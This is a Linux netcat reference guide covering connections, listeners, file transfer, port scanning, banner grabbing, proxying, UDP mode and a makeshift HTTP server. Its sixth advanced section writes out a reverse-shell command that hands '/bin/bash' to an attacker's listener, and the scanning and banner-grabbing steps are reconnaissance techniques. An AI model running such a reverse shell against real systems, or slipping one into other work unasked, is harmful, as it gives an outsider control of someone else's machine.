NC - Linux Netcat Guide
Netcat, often abbreviated as `nc`, is a versatile networking tool in Linux used for reading from and writing to network connections using the TCP or UDP protocol. It can be used for port scanning, banner grabbing, transferring files, and creating network connections for testing or debugging.
Basic Usage
1. Connect to a Remote Service
Netcat can be used to connect to a remote host and port:
$ nc <hostname> <port>
Example:
$ nc example.com 80
This will open a connection to `example.com` on port 80 (HTTP).
2. Listening for Incoming Connections
Netcat can act as a server by listening for incoming connections:
$ nc -l <port>
Example:
$ nc -l 1234
This will listen on port 1234 for incoming connections.
3. Sending Data to a Remote Server
Netcat can send data to a remote server by typing it after the connection is established:
$ nc <hostname> <port> Hello, Server!
Example:
$ nc example.com 80 GET / HTTP/1.1 Host: example.com
This sends an HTTP GET request to the server.
4. Simple Chat Server
Netcat can be used to set up a simple two-way chat system:
1. On the server side, listen on a port:
$ nc -l 1234
2. On the client side, connect to the server:
$ nc <server_ip> 1234
You can then type messages back and forth.
Advanced Usage
1. Transferring Files Using Netcat
Netcat can be used to send and receive files over the network.
- Sending a file:
On the sender's side, use the following command:
$ nc -w 3 <destination_host> <destination_port> < <file_to_send>
Example:
$ nc -w 3 192.168.1.100 1234 < file.txt
On the receiver's side, use the following command to save the incoming data to a file:
$ nc -l -p 1234 > received_file.txt
2. Port Scanning with Netcat
Netcat can be used to scan a range of ports on a remote host. This is useful for determining which ports are open.
$ nc -zv <hostname> <start_port>-<end_port>
Example:
$ nc -zv example.com 80-90
This will scan ports 80 to 90 on `example.com`.
- `-z` tells Netcat to scan without actually sending any data.
- `-v` enables verbose mode, providing more detailed output.
3. Banner Grabbing
Netcat can be used to grab banners from services running on open ports, which can help identify the service version.
Example:
$ nc -v example.com 80
After connecting, you can manually type a request like:
GET / HTTP/1.1 Host: example.com
This might return information about the web server, such as the version of Apache or Nginx.
4. Proxying Connections
Netcat can act as a proxy by forwarding data between two hosts. This is done by creating a listener on one port and forwarding it to another host/port.
$ nc -l -p <local_port> -c 'nc <remote_host> <remote_port>'
Example:
$ nc -l -p 8080 -c 'nc example.com 80'
This listens on port 8080 and forwards the connection to `example.com` on port 80.
5. UDP Mode
By default, Netcat uses TCP. However, you can use it with UDP by using the `-u` flag.
- Listening on UDP:
$ nc -u -l 1234
- Sending data over UDP:
$ echo "Hello" | nc -u <hostname> 1234
6. Reverse Shell with Netcat
A reverse shell can be created using Netcat. This is useful for accessing remote systems where you don’t have direct access to them.
- On the attacker's machine (the one listening for the connection):
$ nc -l -p 4444
- On the target machine (the one connecting back to the attacker):
$ nc <attacker_ip> 4444 -e /bin/bash
This creates a reverse shell, where the attacker has access to the target system’s shell.
7. Netcat as a Simple HTTP Server
Netcat can serve files over HTTP by responding to simple HTTP requests:
$ while true; do echo -ne "HTTP/1.1 200 OK\r\nContent-Length: $(stat -c %s <file>)\r\n\r\n"; cat <file>; done | nc -l 8080
This starts a very basic HTTP server on port 8080, serving the file `<file>`.
